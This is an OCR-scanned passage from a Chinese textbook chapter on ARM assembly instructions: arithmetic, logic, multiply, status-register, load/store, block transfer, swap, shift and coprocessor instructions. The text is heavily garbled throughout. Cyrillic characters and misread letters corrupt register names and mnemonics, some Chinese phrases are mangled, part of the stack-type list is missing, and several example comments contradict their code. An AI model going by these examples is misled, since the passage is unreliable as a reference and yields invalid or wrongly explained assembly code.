RSB 指令 称 为 逆向 减法 指令 ， 用 于 把 操作 数 2 减 去 操作 数 1， 并 将 结果 存放 到 目的 寄存 器 中 。 操 作 数 1 
应 是 一 个 寄存 器 ， 操 作 数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 该 指令 可 用 于 有 符号 数 或 
无 符号 数 的 减法 运算 。 

指令 示例 : 

RSB RO, R1, R2; RO = R2- R1 

RSB RO, R1, #256 ; RO = 256 - R1 

RSB RO, R2, R3, LSL#1 ; RO = (R3 << 1) - R2 

(12) RSC 指令 

RSC 指令 的 格式 为 : 

RSC{ 条 件 KS} 目的 寄存 器 ， 操 作 数 1, 操作 数 2 

RSC 指令 用 于 把 操作 数 2 减 去 操作 数 1， 再 减 去 CPSR 中 的 C 条 件 标志 位 的 反 码 ， 并 将 结果 存放 到 目 
的 寄存 器 中 。 操 作 数 1 应 是 一 个 寄存 器 ， 操 作 数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 该 
指令 使 用 进位 标志 来 表示 借 位 , 这 样 就 可 以 做 大 于 32 位 的 减法 , 注意 不 要 忘记 设置 S 后 级 来 更 改进 位 标志 。 
该 指令 可 用 于 有 符号 数 或 无 符号 数 的 减法 运算 。 

指令 示例 : 

RSC RO,R1,R2;RO=R2-R1-!C 

(13) AND 指令 

AND 指令 的 格式 为 : 

AND{ 条 件 HS} 目的 寄存 器 ， 操 作 数 1， 操 作 数 2 

AND 指令 用 于 在 两 个 操作 数 上 进行 逻辑 与 运算 ， 并 把 结果 放置 到 目的 寄存 器 中 。 操 作 数 1 应 是 一 个 寄 
存 器 ， 操 作 数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 该 指令 常用 于 屏蔽 操作 数 1 的 某 些 位 。 

指令 示例 : 

AND RO, RO, #3; 该 指令 保持 RO 的 0、1 位 ， 其 余 位 清 零 。 

(14) ORR 指令 

ORR 指令 的 格式 为 : 

ORR{ 条 件 }S} 目的 寄存 器 , 操作 数 1, 操作 数 2 

ORR 指令 用 于 在 两 个 操作 数 上 进行 逻辑 或 运算 ， 并 把 结果 放置 到 目的 寄存 器 中 。 操 作 数 1 应 是 一 个 寄 
存 器 ， 操 作 数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 该 指令 常用 于 设置 操作 数 1 的 某 些 位 。 

指令 示例 : 

ОКА КО, КО, #3; 该 指令 设置 RO 的 0、1 位 ， 其 余 位 保持 不 变 

(15) EOR 指令 

EOR 指令 的 格式 为 : 

EOR{ 条 件 }HS} 目的 寄存 器 , 操作 数 1, 操作 数 2 

EOR 指令 用 于 在 两 个 操作 数 上 进行 逻辑 异 或 运算 ， 并 把 结果 放置 到 目的 寄存 器 中 。 操 作 数 1 应 是 一 
个 寄存 器 ,操作 数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 该 指令 常用 于 反 转 操作 数 1 的 某 
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指令 示例 : 

EOR RO, RO, #3; 该 指令 反 转 RO 的 0、1 位 ， 其 余 位 保持 不 变 。 

(16) BIC 指令 

BIC 指令 的 格式 为 : 

BlIC{ 条 件 KS} 目的 寄存 器 ,操作 数 1， 操 作 数 2 

BIC 指令 用 于 清除 操作 数 1 的 某 些 位 ， 并 把 结果 放置 到 目的 寄存 器 中 。 操作 数 1 应 是 一 个 寄存 器 ,操作 
数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 操 作 数 2 为 32 位 的 掩 码 ， 如 果 在 掩 码 中 设置 了 某 

-位 ， 则 清除 这 一 位 。 未 设置 的 拖 码 位 保持 不 变 。 
指令 示例 : 
BIC RO, RO, # %1011 ; 该 指令 清除 RO 中 的 0、1 和 3 位 ， 其 余 的 位 保持 不 变 


3. 乘法 指令 与 乘 加 指令 


ARM 微 处 理 器 支持 的 乘法 指令 与 乘 加 指令 共有 6 条 , 可 分 为 运算 结果 为 32 位 和 运算 结果 为 64 位 两 类 ， 
与 前 面 的 数据 处 理 指令 不 同 ， 指 令 中 的 所 有 操作 数 、 目 的 寄存 器 必须 为 通用 寄存 器 ， 不 能 对 操作 数 使 用 立 
即 数 或 被 移 位 的 寄存 器 ， 同 时 ， 目 的 寄存 器 和 操作 数 1 必须 是 不 同 的 寄存 器 。 
乘法 指令 与 乘 加 指令 共有 以 下 6 条 子 指令 。 
MUL: 32 位 乘法 指令 。 
MLA: 32 位 乘 加 指令 。 
SMULL: 64 位 有 符号 数 乘法 指令 。 
SMLAL: 64 位 有 符号 数 乘 加 指令 。 
UMULL: 64 位 无 符号 数 乘法 指令 。 
UMLAL: 64 位 无 符号 数 乘 加 指令 。 
(1) MUL 指令 
MUL 指令 的 格式 为 : 
MUL{ 条 件 MS} 目的 寄存 器 ,操作 数 1, 操作 数 2 
MUL 指令 完成 将 操作 数 1 与 操作 数 2 的 乘法 运算 ， 并 把 结果 放置 到 目的 寄存 器 中 ， 同 时 可 以 根据 运算 
结果 设置 CPSR 中 相应 的 条 件 标志 位 。 其 中 ， 操 作 数 1 和 操作 数 2 均 为 32 位 的 有 符号 数 或 无 符号 数 。 
指令 示例 : 
MUL RO, R1, R2; RO = R1 x R2 
MULS R0, R1, R2 ; R0 = R1 x R2， 同 时 设置 CPSR 中 的 相关 条 件 标志 位 
(2) MLA 指令 
MLA 指令 的 格式 为 : 
MLA{ 条 件 MS} 目的 寄存 器 ,操作 数 1， 操 作 数 2， 操 作 数 3 
MLA 指令 完成 将 操作 数 1 与 操作 数 2 的 乘法 运算 ， 再 将 乘积 加 上 操作 数 3， 并 把 结果 放置 到 目的 寄存 
器 中 ， 同 时 可 以 根据 运算 结果 设置 CPSR 中 相应 的 条 件 标志 位 。 其 中 ， 操 作 数 1 和 操作 数 2 均 为 32 位 的 有 
符号 数 或 无 符号 数 。 
指令 示例 : 
MLA RO, R1, R2, КЗ; RO = R1 x R2+ КЗ 
MLAS RO, R1, R2, R3; RO = R1 x R2 + R3， 同 时 设置 CPSR 中 的 相关 条 件 标志 位 
(3) SMULL 指令 
SMULL 指令 的 格式 为 : 
SMULL{ 条 件 HS} 目的 寄存 器 Low， 目 的 寄存 器 低 High， 操 作 数 1， 操 作 数 2 
SMULL 指令 完成 将 操作 数 1 与 操作 数 2 的 乘法 运算 ， 并 把 结果 的 低 32 位 放置 到 目的 寄存 器 Low 中 ， 
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结果 的 高 32 位 放置 到 目的 寄存 器 High 中 ， 同 时 可 以 根据 运算 结果 设置 CPSR 中 相应 的 条 件 标志 位 。 其 中 ， 
操作 数 1 和 操作 数 2 均 为 32 位 的 有 符号 数 。 
指令 示例 : 
SMULL RO, R1, R2, R3; КО = (R2 x R3) 的 低 32 位 
;R1= (R2 x КЗ) 的 高 32 位 
(4) SMLAL 指令 
SMLAL 指令 的 格式 为 : 
SMLAL{ 条 件 HS} 目的 寄存 器 Low, 目的 寄存 器 低 High, 操作 数 1， 操 作 数 2 
SMLAL 指令 完成 将 操作 数 1 与 操作 数 2 的 乘法 运算 ， 并 把 结果 的 低 32 位 同 目的 寄存 器 Low 中 的 值 相 
加 后 又 放置 到 目的 寄存 器 Low 中 ,结果 的 高 32 位 同 目的 寄存 器 High 中 的 值 相 加 后 又 放置 到 目的 寄存 器 High 
中 ， 同 时 可 以 根据 运算 结果 设置 CPSR 中 相应 的 条 件 标志 位 。 其 中 ， 操 作 数 1 和 操作 数 2 均 为 32 位 的 有 符 
号 数 。 对 于 目的 寄存 器 Low 来 说 , 在 指令 执行 前 存放 64 位 加 数 的 低 32 位 , 指令 执行 后 存放 结果 的 低 32 位 。 
对 于 目的 寄存 器 High 来 说 ， 在 指令 执行 前 存放 64 位 加 数 的 高 32 位 ， 指 令 执行 后 存放 结果 的 高 32 位 。 
指令 示例 : 
SMLAL RO, R1, R2, R3; RO». (R2x R3) 的 低 32 位 + RO 
;R1= (R2 x ВЗ) 的 高 32 位 + R1 
(5) UMULL 指令 
UMULL 指令 的 格式 为 : 
UMULL{ 条 件 MS} 目的 寄存 器 Low， 目 的 寄存 器 低 High， 操 作 数 1, 操作 数 2 
UMULL 指令 完成 操作 数 1 与 操作 数 2 的 乘法 运算 ， 并 把 结果 的 低 32 位 放置 到 目的 寄存 器 Low 中 ， 结 
果 的 高 32 位 放置 到 目的 寄存 器 High 中 ,同时 可 以 根据 运算 结果 设置 CPSR 中 相应 的 条 件 标志 位 。 其 中 , d 
作 数 1 和 操作 数 2 均 为 32 位 的 无 符号 数 。 
指令 示例 : 
UMULL RO, R1,R2,R3;RO= (R2 х КЗ) 的 低 32 位 
;R1= (R2 x КЗ) 的 高 32 位 
(6) UMLAL 指令 
UMLAL 指令 的 格式 为 : 
UMLAL{ 条 件 }{S} 目的 寄存 器 Low, 目的 寄存 器 低 High， 操 作 数 1， 操 作 数 2 
UMLAL 指令 完成 操作 数 1 与 操作 数 2 的 乘法 运算 ， 并 把 结果 的 低 32 位 同 目的 寄存 器 Low 中 的 值 相 加 
后 放置 到 目的 寄存 器 Low 中 ,结果 的 高 32 位 同 目的 寄存 器 High 中 的 值 相 加 后 又 放置 到 目的 寄存 器 High 中 ， 
同时 可 以 根据 运算 结果 设置 CPSR 中 相应 的 条 件 标志 位 。 其 中 , 操作 数 1 和 操作 数 2 均 为 32 位 的 无 符号 数 。 
对 于 目的 寄存 器 Low， 在 指令 执行 前 存放 64 位 加 数 的 低 32 位 ， 指 令 执 行 后 存放 结果 的 低 32 位 。 
对 于 目的 寄存 器 High， 在 指令 执行 前 存放 64 位 加 数 的 高 32 位， 指令 执行 后 存放 结果 的 高 32 位 。 
指令 示例 : 
UMLAL RO, R1, R2, R3; КО = (R2 x КЗ) 的 低 32 位 + RO 
;R1= (R2xR3) 的 高 32 位 + R1 


4. 程序 状态 寄存 器 访问 指令 


ARM 微 处 理 器 支持 程序 状态 寄存 器 访问 指令 ， 用 于 在 程序 状态 寄存 器 和 通用 寄存 器 之 间 传 送 数据 ， 程 
序 状 态 寄存 器 访问 指令 包括 以 下 两 条 子 指令 。 

口 MRS: 程序 状态 寄存 器 到 通用 寄存 器 的 数据 传送 指令 。 

口 MSR: 通用 寄存 器 到 程序 状态 寄存 器 的 数据 传送 指令 。 
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(1) MRS 指令 

MRS 指令 的 格式 为 : 

MRS{ 条 件 } 通用 寄存 器 ,程序 状态 寄存 器 (CPSR sk SPSR) 

MRS 指令 用 于 将 程序 状态 寄存 器 的 内 容 传送 到 通用 寄存 器 中 。 该 指令 一 般 用 于 以 下 两 种 不 同 的 情况 。 

О 当 需 要 改变 程序 状态 寄存 器 的 内 容 时 ， 可 用 MRS 将 程序 状态 寄存 器 的 内 容 读 入 通用 寄存 器 ， 
修改 后 再 写 回程 序 状态 寄存 器 。 

O 当 在 异常 处 理 或 进程 切换 时 , 需要 保存 程序 状态 寄存 器 的 值 , 可 先 用 该 指令 读 出 程序 状态 寄存 
器 的 值 ， 然 后 保存 。 

指令 示例 : 

MRS RO, CPSR ; 传送 CPSR 的 内 容 到 RO 

MRS RO, SPSR ; 传送 SPSR 的 内 容 到 RO 


(2) MSR 指令 

MSR 指令 的 格式 为 ; 

MSR{ 条 件 } 程序 状态 寄存 器 (CPSR 或 SPSR)_< 域 >, 操作 数 

MSR 指令 用 于 将 操作 数 的 内 容 传 送 到 程序 状态 寄存 器 的 特定 域 中 。 其 中 ， 操 作 数 可 以 为 通用 寄存 器 或 
立即 数 。“< 域 >” 用 于 设置 程序 状态 寄存 器 中 需要 操作 的 位 ，32 位 的 程序 状态 寄存 器 可 以 分 为 如 下 4 个 域 : 

O 位 [31: 2401, HERR. 

ü 位 [23: 16] 为 状态 位 域 ， 用 s 表 示 。 

口 位 [15: 8] 为 扩展 位 域 ， 用 x 表 示 。 

口 位 [7: 0] 为 控制 位 域 ， 用 c 表 示 。 

MSR 指令 通常 用 于 恢复 或 改变 程序 状态 寄存 器 的 内 容 , 在 使 用 时 , 一 般 要 在 MSR 指令 中 指明 将 要 操作 
的 域 。 

指令 示例 : 

MSR CPSR, RO ; 传送 RO 的 内 容 到 CPSR 


MSR SPSR, RO ; 传送 RO 的 内 容 到 SPSR 
MSR CPSR c, RO; 传送 RO 的 内 容 到 SPSR， 但 仅 修改 CPSR 中 的 控制 位 域 


5. 加 载 /存储 指令 

ARM 微 处 理 器 支持 加 载 /存储 指令 用 于 在 寄存 器 和 存储 器 之 间 传 送 数 据 , 加 载 指令 用 于 将 存储 器 中 的 数 
据 传 送 到 寄存 器 ， 存 储 指令 则 完成 相反 的 操作 。 常 用 的 加 载 存 储 指令 如 下 。 
LDR: 字数 据 加 载 指令 。 
LDRB: 字 节 数据 加 载 指令 。 
LDRH: 半 字 数据 加 载 指令 。 
STR: 字数 据 存储 指令 。 
STRB: 字 节 数据 存储 指令 。 
STRH: 半 字 数据 存储 指令 。 

(1) LDR 指令 

LDR 指令 的 格式 为 : 

LDR{ 条 件 } 目的 寄存 器 , < 存储 器 地 址 > 

LDR 指令 用 于 从 存储 器 中 将 一 个 32 位 的 字数 据 传送 到 目的 寄存 器 中 。 该 指令 通常 用 于 从 存储 器 中 读 取 
32 位 的 字数 据 到 通用 寄存 器 , 然后 对 数据 进行 处 理 。 当 程序 计数 器 PC 作为 目的 寄存 器 时 ,指令 从 存储 器 中 
读 取 的 字数 据 被 当 作 目的 地 址 ， 从 而 可 以 实现 程序 流程 的 跳 转 。 该 指令 在 程序 设计 中 比较 常用 ， 且 寻 址 方 


式 灵活 多 样 ， 请 读者 认真 掌握 。 
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指令 示例 : 

LDR R0, [R1] ; 将 存储 器 地 址 为 R1 的 字数 据 读 入 寄存 器 RO 

LDR RO, [R1, R2] ; 将 存储 器 地 址 为 R1+R2 的 字数 据 读 入 寄存 器 RO 

LDR RO, [R1, #8] ; 将 存储 器 地 址 为 R1+8 的 字数 据 读 入 寡 存 器 RO 

LDR RO, [R1, R2] ! ; 将 存储 器 地 址 为 R1+R2 的 字数 据 读 入 寄存 器 RO0， 并 将 新 地 址 R1+R2 SA R1 
LDR RO, [R1, #8] ! ; 将 存储 器 地 址 为 R1+8 的 字数 据 读 入 寄存 器 RO0， 并 将 新 地 址 R1+8 БЛ R1 
LDR R0, [R1], R2 ; 将 存储 器 地 址 为 R1 的 字数 据 读 入 寄存 器 RO， 并 将 新 地 址 R1+R2 SA R1 
LDR RO, [R1, R2, LSL#2]! ; 将 存储 器 地 址 为 R1+R2x4 的 字数 据 读 入 寄存 器 RO0， 并 将 新 地 址 R1+R2x4 Б 
入 R1 


LDRRO,[R1] R2，LSL#2 ; 将 存储 器 地 址 为 R1 的 字数 据 读 入 寄存 器 RO， 并 将 新 地 址 R1+R2x4 БЛ R1 
(2) LDRB 指令 
LDRB 指令 的 格式 为 : 
LDR{ 条 件 }B 目的 寄存 器 , < 存储 器 地 址 > 
LDRB 指令 用 于 从 存储 器 中 将 一 个 8 位 的 字 节 数据 传送 到 目的 寄存 器 中 , 同时 将 寄存 器 的 高 24 位 清 零 。 
该 指令 通常 用 于 从 存储 器 中 读 取 8 位 的 字 节 数据 到 通用 寄存 器 ， 然 后 对 数据 进行 处 理 。 当 程序 计数 器 PC (Е 
为 目的 寄存 器 时 ， 指 令 从 存储 器 中 读 取 的 字数 据 被 当 作 目 的 地 址 ， 从 而 可 以 实现 程序 流程 的 跳 转 。 
指令 示例 : 
LDRB RO, [R1] ; 将 存储 器 地 址 为 R1 的 字 节 数据 读 入 寄存 器 RO， 并 将 RO 的 高 24 位 清 堆 
LDRB RO, [R1, #8]; 将 存储 器 地 址 为 R1+8 的 字 节 数据 读 入 寄存 器 RO， 并 将 RO 的 高 24 位 清 零 
(3) LDRH 指令 
LDRH 指令 的 格式 为 : 
LDR{ 条 件 }H 目的 寄存 器 , < 存储 器 地 址 > 
LDRH 指 令 用 于 从 存储 器 中 将 一 个 16 位 的 半 字 数据 传送 到 目的 寄存 器 中 , 同时 将 寄存 器 的 高 16 位 清 零 。 
该 指令 通常 用 于 从 存储 器 中 读 取 16 位 的 半 字 数据 到 通用 寄存 器 ， 然 后 对 数据 进行 处 理 。 当 程序 计数 器 PC 
作为 目的 寄存 器 时 ， 指 令 从 存储 器 中 读 取 的 字数 据 被 当 作 目的 地 址 ， 从 而 可 以 实现 程序 流程 的 跳 转 。 
指令 示例 : 
LDRH RO, [R1]; 将 存储 器 地 址 为 R1 的 半 字 数据 读 入 寡 存 器 RO， 并 将 КО 的 高 16 位 清 零 
LDRH RO, [R1, #8]; 将 存储 器 地 址 为 R1+8 的 半 字 数据 读 入 寄存 器 RO， 并 将 RO 的 高 16 位 清 零 
LDRH RO, [R1, R2] ; 将 存储 器 地 址 为 R1+R2 的 半 字 数据 读 入 寄存 器 КО, 18 RO 的 高 16 位 清 零 
(4) STR 指令 
STR 指令 的 格式 为 : 
STR{ 条 件 } 源 寄存 器 , < 存储 器 地 址 > 
STR 指令 用 于 从 源 寄存 器 中 将 一 个 32 位 的 字数 据 传送 到 存储 器 中 。 该 指令 在 程序 设计 中 比较 常用 ， 且 
寻 址 方式 灵活 多 样 ， 使 用 方式 可 参考 指令 LDR。 
指令 示例 : 
STR RO, [R1], #8; 将 RO 中 的 字数 据 写 入 以 R1 为 地 址 的 存储 器 中 ， 并 将 新 地 址 R1+8 БЛ Р 
STR RO, [R1, #8]; 将 RO 中 的 字数 据 写 入 以 R1+8 为 地 址 的 存储 器 中 
(5) STRB 指令 
STRB 指令 的 格式 为 : 
STR{ 条 件 }B 源 寄存 器 , < 存储 器 地 址 > 
STRB 指令 用 于 从 源 寄存 器 中 将 一 个 8 位 的 字 节 数据 传送 到 存储 器 中 。 该 字 节 数据 为 源 寄存 器 中 的 低 
8 位 。 
指令 示例 : 
STRB RO, [R1] ; 将 寄存 器 RO 中 的 字 节 数据 写 入 以 R1 为 地 址 的 存储 器 中 
STRB RO, [R1, #8]; 将 寄存 器 RO 中 的 字 节 数据 写 入 以 R1+8 为 地 址 的 存储 器 中 
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(6) STRH 指令 
STRH 指令 的 格式 为 : 
STR{ 条 件 }H 源 寄存 器 , < 存储 器 地 址 > 
STRH 指令 用 于 从 源 寄存 器 中 将 一 个 16 位 的 半 字 数据 传送 到 存储 器 中 。 该 半 字 数据 为 源 寄存 器 中 的 低 


16 位 。 


指令 示例 : 
STRH RO, [R1] ; 将 寄存 器 RO 中 的 半 字 数据 写 入 以 R1 为 地 址 的 存储 器 中 
STRH RO, [R1, #8]; 将 寄存 器 RO 中 的 半 字 数据 写 入 以 R1+8 为 地 址 的 存储 器 中 


6. 批量 数据 加 载 /存储 指令 

ARM 微 处 理 器 支持 批量 数据 加 载 /存储 指令 可 以 一 次 在 一 片 连续 的 存储 器 单元 和 多 个 寄存 器 之 间 传送 
数据 ， 批 量 加 载 指令 用 于 将 一 片 连续 的 存储 器 中 的 数据 传送 到 多 个 寄存 器 ， 批 量 数 据 存储 指令 则 完成 相反 
的 操作 。 常 用 的 加 载 存储 指令 如 下 。 

O LDM: 批量 数据 加 载 指 令 。 

о STM: 批量 数据 存储 指令 。 


LDM (或 STM) 指令 的 格式 为 : 
LDM (或 STM) {条 件 H 类 型 } 基 址 寄存 器 {!}， 寄 存 器 列表 { 人 } 


о (!): 


为 可 选 后 绥 ， 若 选用 该 后 级 ， 则 当 数 据 传 送 完毕 之 后 ， 将 最 后 的 地 址 写 入 基 址 寄存 器 ， 和 否则 


基 址 寄存 器 的 内 容 不 改变 。 基 址 寄存 器 不 允许 为 R15， 寄 存 器 列表 可 以 为 R0 一 R15 的 任意 组 合 。 
O {A}: 为 可 选 后 级 ， 当 指令 为 LDM 且 寄存 器 列表 中 包含 R15， 选 用 该 后 绥 时 表示 : 除了 正常 的 数据 
传送 之 外 ， 还 将 SPSR 复 制 到 CPSR。 同 时 ， 该 后 缀 还 表示 传 入 或 传 出 的 是 用 户 模式 下 的 寄存 器 ， 而 
不 是 当前 模式 下 的 寄存 器 。 
LDM (或 STM) 指令 用 于 从 由 基 址 寄存 器 所 指示 的 一 片 连续 存储 器 到 寄存 器 列表 所 指示 的 多 个 寄存 器 
之 间 传 送 数据 ， 该 指令 的 常见 用 途 是 将 多 个 寄存 器 的 内 容 入 栈 或 出 栈 。 其 中 ，{ 类 型 } 为 如 下 所 示 儿 种 情况 。 


DDODDODD 


IA: 每 次 传送 后 地 址 加 1。 
IB: 每 次 传送 前 地 址 加 1。 
DA: 
DB: 
FD: 
ED: 
FA: 
EA: 


每 次 传送 后 地 址 减 1。 
每 次 传送 前 地 址 减 1。 
满 递 增 堆栈 。 
空 递增 堆栈 。 


指令 示例 : 
STMFD R13}, (RO, R4-R12, LR}; 将 寄存 器 列表 中 的 寄存 器 (RO0, RA 到 R12, LR) 存 入 堆栈 
ГОМЕР К13!, (RO, R4-R12, РС}; 将 堆栈 内 容 恢复 到 寄存 器 (R0, КА 到 R12, LR) 


7. 数据 交换 指令 

ARM 微 处 理 器 所 支持 数据 交换 指令 能 在 存储 器 和 寄存 器 之 间 交 换 数据 。 数 据 交 换 指 令 有 如 下 两 条 。 
口 SWP: 字数 据 交换 指令 。 

口 SWPB: 字 节 数据 交换 指令 。 

(1) SWP 指令 


SWP 指令 的 格式 为 : 
SWP{ 条 件 } 目的 寄存 器 , 源 寄存 器 1, [ 源 寄存 器 2] 


ee 862 £F BAR 


SWP 指令 用 于 将 源 寄 存 器 2 所 指向 的 存储 器 中 的 字数 据 传送 到 目的 寄存 器 中 ， 同 时 将 源 寄 存 器 1 中 的 
字数 据 传送 到 源 寄 存 器 2 所 指向 的 存储 器 中 。 显 然 ， 当 源 寄存 器 1 和 目的 寄存 器 为 同一 个 寄存 器 时 ， 指 令 
交换 该 寄存 器 和 存储 器 的 内 容 。 

指令 示例 : 

EE КІ, [R2] ; 将 R2 所 指向 的 存储 器 中 的 字数 据 传送 到 КО, [818118 RT 中 的 字数 据 传送 到 R2 所 指向 的 存 

元 
SWP RO, RO, [R1] ; 该 指令 完成 将 R1 所 指向 的 存储 器 中 的 字数 据 与 RO 中 的 字数 据 交换 
(2) SWPB 指令 

SWPB 指令 的 格式 为 : 

SWP{ 条 件 }B 目的 寄存 器 , 源 寡 存 器 1, [ 源 寄存 器 2] 

SWPB 指令 用 于 将 源 寄 存 器 2 所 指向 的 存储 器 中 的 字 节 数据 传送 到 目的 寄存 器 中 ， 目 的 寄存 器 的 高 24 
位 清 零 ， 同 时 将 源 寄 存 器 1 中 的 字 节 数据 传送 到 源 寄存 器 2 所 指向 的 存储 器 中 。 显 然 ， 当 源 寄存 器 1 和 目 
的 寄存 器 为 同一 个 寄存 器 时 ， 指 令 交 换 该 寄存 器 和 存储 器 的 内 容 。 

指令 示例 : 

SWPB RO, R1, [R2] ; 将 R2 所 指向 的 存储 器 中 的 字 节 数据 传送 到 КО, RO 的 高 24 位 清 零 ， 同 时 将 R1 中 的 低 8 

位 数据 传送 到 R2 所 指向 的 存储 单元 

SWPB RO, RO, [R1] ; 该 指令 完成 将 R1 所 指向 的 存储 器 中 的 字 节 数据 与 RO 中 的 低 8 位 数据 交换 


8. 移 位 指令 GRE 


ARM 微 处 理 器 内 嵌 的 桶 型 移 位 器 (Barrel Shifter) 支持 数据 的 各 种 移 位 操作 ， 移 位 操作 在 ARM 指令 集 
中 不 作为 单独 的 指令 使 用 ， 只 能 作为 指令 格式 中 一 个 字段 ， 在 汇编 语言 中 表示 为 指令 中 的 选项 。 例 如 ， 数 
据 处 理 指令 的 第 二 个 操作 数 为 寄存 器 时 ， 就 可 以 加 入 移 位 操作 选项 对 其 进行 各 种 移 位 操作 。 移 位 操作 包括 
如 下 6 种 类 型 ，ASL 和 LSL 是 等 价 的 ， 可 以 自由 互 换 。 
LSL: ZHK. 
ASL: 算术 左 移 。 
LSR: WHA. 
ASR: 算术 右 移 。 
ROR: 循环 右 移 。 
RRX: 带 扩展 的 循环 右 移 。 

(1) LSL (或 ASL) 操作 

LSL (或 ASL) 操作 的 格式 为 : 

通用 寄存 器 , 151 (或 ASL) 操作 数 

LSL (EÈ ASL) 可 完成 对 通用 寄存 器 中 的 内 容 进行 逻辑 (或 算术 ) 的 左 移 操作 ， 按 操作 数 所 指定 的 数量 
向 左 移 位 ， 低 位 用 0 来 填充 。 其 中 ， 操 作 数 可 以 是 通用 寄存 器 ， 也 可 以 是 立即 数 (0—3D 。 

操作 示例 : 

MOV RO, R1, LSL#2 ; 将 R1 中 的 内 容 左 移 两 位 后 传送 到 RO 中 

(2) LSR 操作 

LSR 操作 的 格式 为 : 

通用 寄存 器 , LSR 操作 数 

LSR 可 完成 对 通用 寄存 器 中 的 内 容 进 行 右 移 的 操作 ， 按 操作 数 所 指定 的 数量 向 右 移 位 ， 左 端 用 0 来 填 
充 。 其 中 ， 操 作 数 可 以 是 通用 寄存 器 ， 也 可 以 是 立即 数 (0~31) 。 

操作 示例 : 

MOV RO, R1, LSR#2 ; 将 R1 中 的 内 容 右 移 两 位 后 传送 到 RO 中 ， 左 端 用 0 来 填充 
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(3) ASR 操作 

ASR 操作 的 格式 为 : 

ABER, ASR 操作 数 

ASR 可 完成 对 通用 寄存 器 中 的 内 容 进行 右 移 的 操作 ， 按 操作 数 所 指定 的 数量 向 右 移 位 ， 左 端 用 第 31 位 
的 值 来 填充 。 其 中 ， 操 作 数 可 以 是 通用 寄存 器 ， 也 可 以 是 立即 数 (0—3D 。 

操作 示例 : 

MOV RO, R1, ASR#2 ; 将 R1 中 的 内 容 右 移 两 位 后 传送 到 RO 中 ， 左 端 用 第 31 位 的 值 来 填充 

(4) ROR 操作 

ROR 操作 的 格式 为 : 

通用 寄存 器 , ROR 操作 数 

ROR 可 完成 对 通用 寄存 器 中 的 内 容 进 行 循环 右 移 的 操作 ， 按 操作 数 所 指定 的 数量 向 右 循环 移 位 ， 左 端 
用 右 端 移出 的 位 来 填充 。 其 中 ， 操 作 数 可 以 是 通用 寄存 器 ， 也 可 以 是 立即 数 (0 一 31) 。 显 然 ， 当 进行 32 
位 的 循环 右 移 操作 时 ， 通 用 寄存 器 中 的 值 不 改变 。 

操作 示例 : 

MOV RO, R1, ROR#2 ; 将 R1 中 的 内 容 循环 右 移 两 位 后 传送 到 RO 中 

(5) RRX 操作 

RRX 操作 的 格式 为 : 

通用 寄存 器 , RRX 操作 数 

RRX 可 完成 对 通用 寄存 器 中 的 内 容 进 行 带 扩 展 的 循环 右 移 的 操作 ， 按 操作 数 所 指定 的 数量 向 右 循环 移 
位 ， 左 端 用 进位 标志 位 C 来 填充 。 其 中 ， 操 作 数 可 以 是 通用 寄存 器 ， 也 可 以 是 立即 数 (0~31) 。 

操作 示例 : 

MOV КО, R1, RRX#2 ; 将 R1 中 的 内 容 进行 带 扩展 的 循环 右 移 两 位 后 传送 到 RO 中 

9. 协 处 理 器 指令 


ARM 微 处 理 器 可 支持 多 达 16 个 协 处 理 器 ， 用 于 各 种 协 处 理 操 作 ， 在 程序 执行 的 过 程 中 ， 每 个 协 处 理 
器 只 执行 针对 自身 的 协 处 理 指令 ， 忽 略 ARM 处 理 器 和 其 他 协 处 理 器 的 指令 。 

ARM 的 协 处 理 器 指令 主要 用 于 ARM 处 理 器 初始 化 ARM 协 处 理 器 的 数据 处 理 操作 , 在 ARM 处 理 器 的 
寄存 器 和 协 处 理 器 的 寄存 器 之 间 传 送 数据 ， 以 及 在 ARM 协 处 理 器 的 寄存 器 和 存储 器 之 间 传 送 数据 。ARM 
协 处 理 器 指令 包括 以 下 5 条 。 

口 CDP: 协 处 理 器 数 操作 指令 。 

O LDC: 协 处 理 器 数据 加 载 指令 。 

о STC:， 协 处 理 器 数据 存储 指令 。 

口 MCR: ARM 处 理 器 寄存 器 到 协 处 理 器 寄存 器 的 数据 传送 指令 。 

口 МЕС: 协 处 理 器 寄存 器 到 ARM 处 理 器 寄存 器 的 数据 传送 指令 。 

(D CDP 指令 

CDP 指令 的 格式 为 : 

CDP{ 条 件 } 协 处 理 器 编码 , 协 处 理 器 操作 码 1, 目的 寄存 器 ， 源 寄存 器 1， 源 寄存 器 2， 协 处 理 器 操作 码 2 

СОР 指令 用 于 ARM 处 理 器 通知 ARM 协 处 理 器 执行 特定 的 操作 , 若 协 处 理 器 不 能 成 功 完成 特定 的 操作 ， 
则 产生 未 定义 指令 异常 。 其 中 ， 协 处 理 器 操作 码 1 和 协 处 理 器 操作 码 2 为 协 处 理 器 将 要 执行 的 操作 ， 目 的 
寄存 器 和 源 寄 存 器 均 为 协 处 理 器 的 寄存 器 ， 指 令 不 涉及 ARM 处 理 器 的 寄存 器 和 存储 器 。 

指令 示例 : 

CDP P3, 2, C12, C10, C3, 4 ; 该 指令 完成 协 处 理 器 P3 的 初始 化 
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(2) LDC 指令 
LDC 指令 的 格式 为 : 
LDC{ 条 件 HL} 协 处 理 器 编码 ,目的 寄存 器 , RSE] 
LDC 指令 用 于 将 源 寄 存 器 所 指向 的 存储 器 中 的 字数 据 传送 到 目的 寄存 器 中 ， 若 协 处 理 器 不 能 成 功 完 
传送 操作 ， 则 产生 未 定义 指令 异常 。 其 中 ， 生 } 选 项 表示 指令 为 长 读 取 操 作 ， 如 用 于 双 精 度数 据 的 传输 。 
指令 示例 : 
LDC P3, C4, [RO]; 将 ARM 处 理 器 的 寄存 器 RO 所 指向 的 存储 器 中 的 字数 据 传送 到 协 处 理 器 P3 的 寄存 器 CA 中 
(3) STC 指令 
STC 指令 的 格式 为 : 
STC{ 条 件 HL} 协 处 理 器 编码 , 源 寄存 器 , [目的 寄存 器 ] 
STC 指令 用 于 将 源 寄存 器 中 的 字数 据 传送 到 目的 寄存 器 所 指向 的 存储 器 中 ， 若 协 处 理 器 不 能 成 功 完成 
